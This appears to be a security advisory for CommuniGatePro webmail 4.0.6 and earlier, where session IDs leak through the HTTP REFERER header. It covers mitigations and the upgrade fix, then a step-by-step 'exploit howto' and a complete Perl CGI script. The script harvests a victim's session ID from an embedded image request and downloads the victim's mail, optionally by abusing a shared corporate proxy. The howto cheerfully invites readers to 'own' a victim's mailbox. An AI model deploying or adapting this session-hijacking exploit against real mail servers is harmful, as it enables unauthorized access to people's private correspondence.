Vulnerability in CommuniGatePro webmail under some
circumstances may allow attacker to get access to users
mailbox.
Object:
CommuniGatePro version 4.0.6 and earlier.
Not vulnerable (according to Stalker.com) 4.1b2 (with
UseCookies option)
Vendor:
Stalker Software Inc. www.stalker.com
Description:
Session ID used in CGP WebMail to track sessions is
transferred in REFERER field of HTTP request when user
browsers requests images or other resources from HTML
message. Attacker can send HTML message with img src
from his server and when user will read it in webmail,
attacker may visit address from REFERER field and
hijack current user session - read mailbox, write
messages, etc.
Mitigating Factors:
If user has turned on IP session control attacker can
access mailbox only from user IP (or use same proxy).
Access is opened only for duration of session time.
Solution:
Upgrade to 4.1b2 or later version.
Workaround:
There is no known way to fix problem on server side,
but users can configure their browsers, proxy servers
and/or firewalls not to send REFERER field and change
setting to allow only one IP to be used during session
(this option alone doesn't help against exploit if
attacker can use same proxy server as victim).
Vendor status:
Problem was known or long time and mentioned in CGP
maillists. Vendor confirmed problem and fixed in 4.1b2.
Exploit section
---------------
Exploit howto
-------------
Below is exploit code. Place it into cgi-bin, then
(recommended) make symlink from
DocumentRoot/AnyImage.gif to shj.pl, configure
at least $url variable, and possible other vars and
send victim HTML message with img src to your
AnyImage.gif. When victim will read message, script
will download messages 1..10 from his mailbox (if
sucessfull).
Script will work even if "require fixed address" option
enabled (set $abuseproxy=1), but it needs access to
users proxy (IP will be detected automatically). So, if
your victim uses same corporate proxy as you, then
you're lucky, you can own his mailbox! :)
If victim uses HTTPS to access CGP webmail, use
https:// link to image. some browsers will still send
HTTP_REFERER if _both_ sites are https.
Exploit code (shj.pl)
------------
#!/usr/bin/perl
#
# session hijacking and mail downloading exploit for
CommuniGatePro 4.0.6
#
# Yaroslav Polyakov. xenon (at) sysAttack (dot) com [email concealed] www.sysAttack.com
#
use LWP::UserAgent;
# configuration vars
$logfile="/tmp/log";
$url="http://COMMUNIGATE/Session/%SID%/Message.wssp?Mailbox=INBOX&MSG=%N
%";
$SIDREGEXP="Session/([0-9a-zA-Z\-]+)/";
$msglonum=1;
$msghinum=10;
$msgprefix="/tmp/hijacked-";
$abuseproxy=1;
$proxyport=3128;
sub printgif
{
$gif1x1="\x47\x49\x46\x38\x39\x61\x01\x00\x01\x00\x80\xff\x00\xc0\xc0\xc
0
\x00\x00\x00\x21\xf9\x04\x01\x00\x00\x00\x00\x2c\x00\x00\x00\x00
\x01\x00\x01\x00\x00\x02\x02\x44\x01\x00\x3b";
print "Content-Type: image/gif\n";
print "\n";
print "$gif1x1";
}
open LOG, "> $logfile" || die("cant write to my log");
printgif;
$remote=$ENV{'REMOTE_ADDR'};
$referer=$ENV{'HTTP_REFERER'};
print LOG "remote: $remote\nreferer: $referer\n";
# if($referer=~/SID=([0-9a-zA-Z\-]+)/){
if($referer=~/$SIDREGEXP/){
$SID=$1;
print LOG "SID: $SID\n";
}else{
print LOG "sorry, cant
find out SID\n";
exit;
}
# create request
my $ua = new LWP::UserAgent;
$ua->agent("shj - sysAttack CGP session HiJack/1.0");
if($abuseproxy){
print LOG "set proxy
http://$remote:$proxyport/\n";
$ua->proxy('http',
"http://$remote:$proxyport/");
}
for($index=$msglonum;$index<=$msghinum;$index++){
$eurl=$url;
$eurl =~ s/%N%/$index/;
$eurl =~ s/%SID%/$SID/;
print LOG "fetching $eurl\n";
$request = new HTTP::Request("GET", $eurl);
$response = $ua->request($request);
if($response){
print LOG
$response->code." ".$response->message
."\n";
open MSG, ">
$msgprefix$index" or die('cant crea
te $msgprefix$index');
print MSG
$response->content;
close MSG;
}else{
print LOG "undefined
response\n";
}
}
close LOG;
===
P.S.
And sorry for bad english :)